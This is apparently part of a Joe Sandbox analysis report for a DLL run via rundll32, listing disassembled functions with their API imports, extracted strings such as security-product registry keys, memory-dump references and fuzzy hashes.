Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005A8D8 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 000000018005A906
EnterCriticalSection.KERNEL32 ref: 000000018005A951
_time64.MSVCRT ref: 000000018005A95D
LeaveCriticalSection.KERNEL32 ref: 000000018005AAC1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection_time64$EnterLeave
String ID:
API String ID: 3499907473-0
Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074200 Relevance: 12.1, APIs: 8, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180074221

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180061518 Relevance: 11.3, APIs: 9, Instructions: 68COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 000000018006153C
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 0000000180061550
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 0000000180061564
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 0000000180061578
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 00000001800615AA
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 00000001800615BD
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 00000001800615D0
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 00000001800615E4
free.MSVCRT(?,?,00000000,000000018005D5C8), ref: 00000001800615F8

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 479d6b322858d1b6fb9b2a33bd2b2862127450e003e1d21a635a901cbd1a60b9
Instruction ID: d0fbe37a2b12f24882e89a36d068dfa1d6ae687bd891c2bf64f12d69b9b9f573
Opcode Fuzzy Hash: 479d6b322858d1b6fb9b2a33bd2b2862127450e003e1d21a635a901cbd1a60b9
Instruction Fuzzy Hash: 88318B36602B189AFF8ADFD1D9543B823A1FF88B86F198514DA670B554CF38C698C341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056664 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 463registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A

RegCloseKey.ADVAPI32 ref: 0000000180056B49

Strings

360Safe, xrefs: 00000001800566C5
?, xrefs: 0000000180056B12
SOFTWARE\, xrefs: 0000000180056852, 0000000180056A1B, 0000000180056BC8
SOFTWARE\Wow6432Node\, xrefs: 000000018005678F, 000000018005695A, 0000000180056B7E
360EntSecurity, xrefs: 00000001800566AF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
API String ID: 2226481571-3054377637
Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002D320 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

FILETYPE, xrefs: 000000018002D4DB, 000000018002D68B, 000000018002D745
CLSID, xrefs: 000000018002D4E2, 000000018002D692, 000000018002D74C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: CLSID$FILETYPE
API String ID: 0-673176369
Opcode ID: 4c244d9c868472f455db6426f5af94abee75d2223c47d993bd46d00cae99b97c
Instruction ID: 664a91b93eddc4d250d885b2200669a72768227afd9472cb587bdefcc3a95370
Opcode Fuzzy Hash: 4c244d9c868472f455db6426f5af94abee75d2223c47d993bd46d00cae99b97c
Instruction Fuzzy Hash: CFF16B72615B8886EB92CF25E8407DD63A1F788BE4F149212FE5D43B99DF78CA44C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C720 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000018004C7EF
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004C802
??3@YAXPEAX@Z.MSVCRT ref: 000000018004C815
_wtoi.MSVCRT ref: 000000018004C918

Part of subcall function 000000018004CD44: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CDF5

SysFreeString.OLEAUT32 ref: 000000018004C9F7

Strings

//reccfg/wndclass, xrefs: 000000018004C79A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FreeString$??2@??3@_wtoi
String ID: //reccfg/wndclass
API String ID: 1119205991-3779619899
Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042664 Relevance: 10.7, APIs: 7, Instructions: 237networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180042CB8: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94

htons.WS2_32 ref: 00000001800427AA
htonl.WS2_32 ref: 00000001800427B7
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800428C1
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042920
memmove.MSVCRT ref: 0000000180042957

Part of subcall function 0000000180043090: MultiByteToWideChar.KERNEL32 ref: 00000001800430C2
Part of subcall function 0000000180043090: ??_V@YAXPEAX@Z.MSVCRT ref: 00000001800430E0
Part of subcall function 0000000180043090: MultiByteToWideChar.KERNEL32 ref: 0000000180043129

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800429A0
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800429CB

Part of subcall function 0000000180043214: htonl.WS2_32 ref: 0000000180043230

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$htonl$htonsmemmove
String ID:
API String ID: 2604728826-0
Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068020 Relevance: 10.7, APIs: 7, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

memmove.MSVCRT ref: 000000018006809D
??3@YAXPEAX@Z.MSVCRT ref: 0000000180068131
??3@YAXPEAX@Z.MSVCRT ref: 000000018006818D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001AF0F), ref: 00000001800681DE
_CxxThrowException.MSVCRT ref: 0000000180068219
?terminate@@YAXXZ.MSVCRT ref: 00000001800682C7
?terminate@@YAXXZ.MSVCRT ref: 00000001800682CD

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
String ID:
API String ID: 223594506-0
Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CB00 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

SHGetValueW.SHLWAPI ref: 000000018000CBF6
_time64.MSVCRT ref: 000000018000CC10

Part of subcall function 0000000180070DD0: _errno.MSVCRT ref: 0000000180070DDE

Part of subcall function 0000000180070DD0: _errno.MSVCRT ref: 0000000180070E1F

SHGetValueW.SHLWAPI ref: 000000018000CD0C

Strings

%s_count, xrefs: 000000018000CB87
%s_lasttime, xrefs: 000000018000CB9B
CloudCfg, xrefs: 000000018000CBBA

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Value_errno$HeapProcess_time64
String ID: %s_count$%s_lasttime$CloudCfg
API String ID: 2146318826-610660357
Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E478 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32 ref: 000000018000E612
GetHGlobalFromStream.OLE32 ref: 000000018000E64C
GlobalLock.KERNEL32 ref: 000000018000E65F
GlobalSize.KERNEL32 ref: 000000018000E66C

Part of subcall function 000000018000E6F8: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000E74D

GlobalUnlock.KERNEL32 ref: 000000018000E6BE

Strings

__Location__, xrefs: 000000018000E59C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Global$Stream$??3@CreateFromLockSizeUnlock
String ID: __Location__
API String ID: 3539542440-1240413640
Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800416AC Relevance: 10.7, APIs: 7, Instructions: 186filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018004171A
GetFileSize.KERNEL32 ref: 0000000180041732
ReadFile.KERNEL32 ref: 0000000180041775
CloseHandle.KERNEL32 ref: 0000000180041796
GetLocalTime.KERNEL32 ref: 0000000180041894

Part of subcall function 000000018000D19C: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000D22A
Part of subcall function 000000018000D19C: memset.MSVCRT ref: 000000018000D270
Part of subcall function 000000018000D19C: memmove.MSVCRT ref: 000000018000D282
Part of subcall function 000000018000D19C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000D2B8

memset.MSVCRT ref: 00000001800418D5
??3@YAXPEAX@Z.MSVCRT ref: 000000018004190C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$??3@memset$??2@CloseCreateHandleLocalReadSizeTimememmove
String ID:
API String ID: 1580871609-0
Opcode ID: 1ea34bf717c188f261df4d55dace50faf815ae1420c68309131a6986235bd89a
Instruction ID: 9ee3987d771936754bf2ec95240b51fbfdf566f0c87b186fa2af0a924239acdb
Opcode Fuzzy Hash: 1ea34bf717c188f261df4d55dace50faf815ae1420c68309131a6986235bd89a
Instruction Fuzzy Hash: B981AA32A00B489AE795DF69D5803ED33B0F748BDDF008215EE1A17A95EF34D6A9C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180073620 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

tolower.MSVCRT ref: 0000000180073771
__pctype_func.MSVCRT ref: 00000001800737A8
tolower.MSVCRT ref: 00000001800737C4
localeconv.MSVCRT ref: 00000001800737D3

Strings

s, xrefs: 0000000180073886
@, xrefs: 000000018007385E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: tolower$__pctype_funclocaleconv
String ID: @$s
API String ID: 1428271734-3074397682
Opcode ID: 870097dd4b244917463ce528d91e901578feaee94ff52399b12698ab5ca81f40
Instruction ID: 6108c58a119eda9aeebc8c7cffb63edf03d10b724980f2cc7b0e25c2db6eeec6
Opcode Fuzzy Hash: 870097dd4b244917463ce528d91e901578feaee94ff52399b12698ab5ca81f40
Instruction Fuzzy Hash: 2381BFB2208B9886EBA68F29D0513ED7BA1E349BD4F14C116EB9957398DF3EC945C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180037560 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI ref: 0000000180037599
wcschr.MSVCRT ref: 000000018003766B
wcschr.MSVCRT ref: 00000001800376A4
StrStrIW.SHLWAPI ref: 00000001800376B8
StrPBrkW.SHLWAPI ref: 0000000180037725

Strings

, xrefs: 000000018003771B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcschr
String ID:
API String ID: 1497570035-178107231
Opcode ID: 91aaae39f80d0418fd6fc02b66f74db7f1f6b55bc5cea72befadec07e3e486c7
Instruction ID: 551f47029daa90ee5f8560b06094b5e5181bcf51381db03c2015ed80f31b1854
Opcode Fuzzy Hash: 91aaae39f80d0418fd6fc02b66f74db7f1f6b55bc5cea72befadec07e3e486c7
Instruction Fuzzy Hash: B351E571306A5880FAB39B1A84253EA73A0A71DFE8F56C121EE5D077D2EF38C6498300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C68 Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

CharNextW.USER32 ref: 0000000180008CA7
CharNextW.USER32 ref: 0000000180008CD3
CharNextW.USER32 ref: 0000000180008CED
CharNextW.USER32 ref: 0000000180008D05
CharNextW.USER32 ref: 0000000180008D14
CharNextW.USER32 ref: 0000000180008D81
CharNextW.USER32 ref: 0000000180008DA5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003168C Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI ref: 00000001800316B6
StrStrIW.SHLWAPI ref: 00000001800316D4
StrStrIW.SHLWAPI ref: 0000000180031808

Strings

<CHANNEL, xrefs: 00000001800316CA, 00000001800317FE
HREF, xrefs: 0000000180031749, 00000001800317B0
>, xrefs: 00000001800316E6
<?XML, xrefs: 00000001800316AC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: <?XML$<CHANNEL$>$HREF
API String ID: 0-1028254503
Opcode ID: 87a41a6c4d0ae98e7d69096c7a3dafb46038613e02f69647dbd2907609dc09b6
Instruction ID: 67ff59abb7716e8502629db63671e64219ed1040f01711d1584acfb3c691788b
Opcode Fuzzy Hash: 87a41a6c4d0ae98e7d69096c7a3dafb46038613e02f69647dbd2907609dc09b6
Instruction Fuzzy Hash: AB412576205A4986EA93DF29D4407EA23A1F74CBF1F49C312FA69076E4EF38C659C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C97C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000CB00: SHGetValueW.SHLWAPI ref: 000000018000CBF6
Part of subcall function 000000018000CB00: _time64.MSVCRT ref: 000000018000CC10

_time64.MSVCRT ref: 000000018000C9A2

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

SHSetValueW.SHLWAPI ref: 000000018000CA52
SHSetValueW.SHLWAPI ref: 000000018000CA73

Strings

%s_count, xrefs: 000000018000C9EC
%s_lasttime, xrefs: 000000018000C9FF
CloudCfg, xrefs: 000000018000CA14

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

